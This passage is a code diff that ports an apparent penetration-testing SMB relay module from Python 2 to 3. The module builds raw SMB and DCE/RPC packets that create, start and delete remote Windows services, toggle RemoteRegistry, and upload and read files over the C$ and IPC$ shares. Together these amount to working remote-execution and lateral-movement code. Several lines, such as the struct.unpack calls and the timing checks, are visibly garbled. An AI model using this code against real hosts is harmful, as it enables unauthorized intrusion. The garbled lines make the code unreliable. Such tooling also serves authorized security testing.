SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler) + x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLQueryService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to start the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) + x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLControlService, stop operation. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to query the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") + x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLDeleteService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to start the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) + x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLCloseService + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to delete the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) + x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s, f ########################### @@ -538,186 +1015,186 @@ def CreateService(Command, f, host, data, s): ########################### def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) w.calculate() x = SMBDCEPacketData(Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##Error handling. - if data[8:10] == "\x2e\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + if data[8:10] == b"\x2e\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to create the service\n") return ModifySMBRetCode(data) #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #ContextHandlerService = data[88:108] - ContextHandler = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry") w.calculate() x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLStartService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open the service.\n") return ModifySMBRetCode(data) - ContextHandlerService = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandlerService = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLStartService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLQueryService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to start the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - + time.sleep(3) ## DCE/RPC SVCCTLCloseService - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to query the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - return data, s, f + return data, s, f ########################### #Stop Winreg Service ########################### def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) w.calculate() x = SMBDCEPacketData(Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##Error handling. - if data[8:10] == "\x2e\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + if data[8:10] == b"\x2e\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to create the service\n") return ModifySMBRetCode(data) #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #ContextHandlerService = data[88:108] - ContextHandler = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry") w.calculate() x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLStartService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open the service.\n") return ModifySMBRetCode(data) - ContextHandlerService = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandlerService = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLQueryService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to stop the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to stop the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLCloseService - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to query the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - return data, s, f + return data, s, f ########################### @@ -726,12 +1203,23 @@ def StopWinregService(f, host, data, s): def CloseFID(f, data, s): ##Close FID Request - if data[8:10] == "\x25\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") - t = CloseRequest(FID = f) + if data[8:10] == b"\x25\x00": + head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = CloseRequest(FID = f.decode('latin-1')) packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s + +def SMBDCERPCCloseFID(f, data, s): + ##Close FID Request + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = CloseRequest(FID = f.decode('latin-1')) + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) return data, s @@ -740,67 +1228,149 @@ def CloseFID(f, data, s): ########################### def SMBOpenFile(Filename, Share, Host, Access, data, s): + if isinstance(data, str): + data.encode('latin-1') ##Start with a Tree connect on C$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$") t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##OpenAndX. - if data[8:10] == "\x75\x00": - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00",DesiredAccess=Access) + if data[8:10] == b"\x75\x00": + head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = OpenAndX(File=Filename, OpenFunc="\x01\x00", Flags="\x07\x00", DesiredAccess=Access) t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - if data[8:10] == "\x2d\x22": - print "[+] Can't open the file, access is denied (write protected file?)." + if data[8:10] == b"\x2d\x22": + print("[+] Can't open the file, access is denied (write protected file?).") f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f - if data[8:10] == "\x2d\x00":##Found all good. + if data[8:10] == b"\x2d\x43": + print("[+] Sharing violation, waiting a bit and attempting again.") + time.sleep(2) + head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = OpenAndX(File=Filename, OpenFunc="\x01\x00",DesiredAccess=Access) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + if data[8:10] == b"\x2d\x00":##Found all good. f = data[41:43] return data, s, f - if data[8:10] == "\x2d\x34":#not found - time.sleep(5)#maybe still processing the cmd. Be patient, then grab it again. - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") + if data[8:10] == b"\x2d\x34":#not found + time.sleep(2)#maybe still processing the cmd. Be patient, then grab it again. + head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") t = OpenAndX(File=Filename, OpenFunc="\x01\x00") t.calculate() packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##OpenAndX. - if data[8:10] == "\x2d\x34": - print "[+] The command failed or took to long to complete." + if data[8:10] == b"\x2d\x34": + print("[+] The command failed or took to long to complete.") return data, s ##all good. - if data[8:10] == "\x2d\x00": - f = data[41:43] - return data, s, f + if data[8:10] == b"\x2d\x00": + f = data[41:43] + return data, s, f ########################### -#Read then delete it. +#Open a file for writing +########################### + +def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, data, s): + if isinstance(data, str): + data = data.encode('latin-1') + ##Start with a Tree connect on C$ + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ##NtCreate. + if data[8:10] == b"\x75\x00": + head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = SMBNTCreateData(FileName="Windows\\Temp\\"+Filename, CreateFlags="\x00\x00\x00\x00", AccessMask="\x96\x01\x03\x00",FileAttrib="\x20\x00\x00\x00", ShareAccess="\x00\x00\x00\x00", Disposition = "\x02\x00\x00\x00", CreateOptions="\x44\x00\x00\x00") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + if data[8:10] == b"\xa2\x22": + print("[+] Can't open the file, access is denied (write protected file?).") + f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. + #We'll recover that connection.. + return data, s, f + + if data[8:10] == b"\xa2\x35": + print("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename) + f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. + #We'll recover that connection.. + return data, s, f + + if data[8:10] == b"\xa2\x00":##Found, all good. + f = data[42:44] + return data, s, f + + ##OpenAndX. + if data[8:10] == b"\xa2\x34": + print("[+] The command failed or took to long to complete.") + return data, s + + ##all good. + if data[8:10] == b"\xa2\x00": + f = data[41:43] + return data, s, f +########################### +#Open an IPC$ channel. ########################### def SMBOpenPipe(Host, data, s): - ##Start with a Tree connect on C$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if isinstance(data, str): + data = data.encode('latin-1') + else: + pass + ##Start with a Tree connect on IPC$ + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) t = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$") t.calculate() packet1 = str(head)+str(t) buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s + +########################### +#Close a TID +########################### + +def CloseTID(data, s): + ##Start with a Tree connect on IPC$ + head = SMBHeader(cmd="\x71",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeDisconnect() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) return data, s @@ -809,438 +1379,695 @@ def SMBOpenPipe(Host, data, s): ########################### def GrabAndRead(f, Filename, data, s): ##ReadRequest. - if data[8:10] == "\x2d\x00": - ##grab the filesize from the OpenAndX response. - filesize = struct.unpack(" 65520. - first = filesize-65520 - if first <= 65520: - count_number = 1 - else: - count_number = int(first/65520)+1 - count = 0 - dataoffset = 0 - bar = 80 - for i in xrange(count_number): - count = count+1 - alreadydone = int(round(80 * count / float(count_number))) - pourcent = round(100.0 * count / float(count_number), 1) - progress = '=' * alreadydone + '-' * (80 - alreadydone) - sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) - sys.stdout.flush() - dataoffset = dataoffset + 65520 - data, s, out = ReadOutput(struct.pack("60: - minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.'%(minutes) - if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + if data[8:10] == b"\x2d\x00": + ##grab the filesize from the OpenAndX response. + filesize = struct.unpack(" 65520. + first = filesize-65520 + if first <= 65520: + count_number = 1 + else: + count_number = int(first/65520)+1 + count = 0 + dataoffset = 0 + bar = 80 + for i in range(count_number): + count = count+1 + alreadydone = int(round(80 * count / float(count_number))) + pourcent = round(100.0 * count / float(count_number), 1) + progress = '=' * alreadydone + '-' * (80 - alreadydone) + sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) + sys.stdout.flush() + dataoffset = dataoffset + 65520 + data, s, out = ReadOutput(StructWithLenPython2or3("60: + minutes = Seconds/60 + print('Downloaded in: %.3g minutes.'%(minutes)) + if Seconds<60: + print('Downloaded in: %.3g seconds'%(Seconds)) + if isinstance(data, str): + data = data.encode('latin-1') ##Close Request - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") - t = CloseRequest(FID = f) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = CloseRequest(FID = f.decode('latin-1')) packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) return data, s, Output +########################### +#Write it. +########################### +def UploadAndWrite(f, FileSize, FileContent, data, s): + ##WriteRequest for a small file. + if data[8:10] == b"\xa2\x00" and int(FileSize) <= 29999: + head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") + t = SMBWriteData(FID=f.decode('latin-1'), Data=FileContent) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + ##WriteRequest for a big file. + if data[8:10] == b"\xa2\x00" and int(FileSize) >= 30000: + ##How many requests? + count_number = int(FileSize/30000)+1 + #Do progress bar for large uploads, so the pentester doesn't fall asleep while doing a large SMB write operations.. + dataoffset = 0 + count = 0 + bar = 80 + start_time = time.time() + print('File size: %s'%(GetReadableSize(FileSize))) + for i in range(count_number): + count = count+1 + Chunk = FileContent[dataoffset:dataoffset+30000] + alreadydone = int(round(80 * count / float(count_number))) + pourcent = round(100.0 * count / float(count_number), 1) + progress = '=' * alreadydone + '-' * (80 - alreadydone) + sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) + sys.stdout.flush() + + if len(Chunk) == 0: + pass + else: + data, s = WriteOutput(StructWithLenPython2or3("60: + minutes = Seconds/60 + print('Uploaded in: %.3g minutes.'%(minutes)) + if Seconds<60: + print('Uploaded in: %.3g seconds'%(Seconds)) + + ##Close Request + if data[8:10] == b"\x2f\x00": + head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = CloseRequest(FID = f.decode('latin-1')) + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s + ########################### #Read then delete it. ########################### def ReadAndDelete(f, Filename, data, s): ##ReadRequest. - if data[8:10] == "\x2d\x00": - filesize = struct.unpack(" 65520. - first = filesize-65520 - if first <= 65520: - count_number = 1 - else: - count_number = int(first/65520)+1 - count = 0 - dataoffset = 0 - bar = 80 - for i in xrange(count_number): - count = count+1 - alreadydone = int(round(80 * count / float(count_number))) - pourcent = round(100.0 * count / float(count_number), 1) - progress = '=' * alreadydone + '-' * (80 - alreadydone) - sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) - sys.stdout.flush() - dataoffset = dataoffset + 65520 - data, s, out = ReadOutput(struct.pack("60: - minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.\n'%(minutes) - if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + if data[8:10] == b"\x2d\x00": + filesize = struct.unpack(" 65520. + first = filesize-65520 + if first <= 65520: + count_number = 1 + else: + count_number = int(first/65520)+1 + count = 0 + dataoffset = 0 + bar = 80 + for i in range(count_number): + count = count+1 + 